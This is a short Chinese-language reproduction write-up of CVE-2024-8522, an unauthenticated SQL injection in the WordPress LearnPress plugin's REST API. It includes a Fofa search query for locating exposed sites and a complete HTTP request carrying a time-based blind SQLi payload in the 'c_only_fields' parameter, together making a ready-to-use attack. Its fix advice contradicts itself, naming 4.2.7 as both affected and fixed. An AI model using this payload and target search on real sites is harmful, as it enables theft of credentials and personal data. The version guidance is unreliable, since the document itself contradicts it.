WordPress LearnPress插件 SQL注入复现(CVE-2024-8522)
0x01 产品描述:
LearnPress 是一款功能强大的 WordPress LMS(学习管理系统)插件,适用于创建和销售在线课程。凭借其直观的界面和丰富的功能,无论您是否具备编程背景,都能轻松搭建起在线教育网站。学会如何使用 LearnPress,意味着您可以快速地建立教育、学校或课程销售网站。
0x02 漏洞描述:
LearnPress是一款广受欢迎的WordPress在线课程管理工具插件,近期被发现存在一个高危SQL注入漏洞,编号为CVE-2024-8522,其CVSS评分高达10,表明该漏洞具有极高的严重性。此漏洞潜藏于LearnPress的REST API端点中,具体关联到“c_only_fields”参数的处理不当,因缺乏足够的转义措施和SQL查询准备,使得未经身份验证的攻击者能够注入恶意SQL代码,进而可能访问并窃取存储在WordPress数据库中的敏感信息,如用户凭证、个人数据及课程资料
0x03 影响版本:
LearnPress <= 4.2.7
0x04 搜索语句:
Fofa:body="/wp-content/plugins/learnpress"
0x05 漏洞复现:
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(5)),0) HTTP/1.1
Host: your-ip
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 35
0x06 修复建议:
厂商已发布4.2.7版本以修复该问题,存在问题的系统可更新至4.2.7用以修复
CVE-2024-8522 & CVE-2024-8529 (CVSS 10): LearnPress SQLi Flaw Leaves 90K+ WordPress Sites at Risk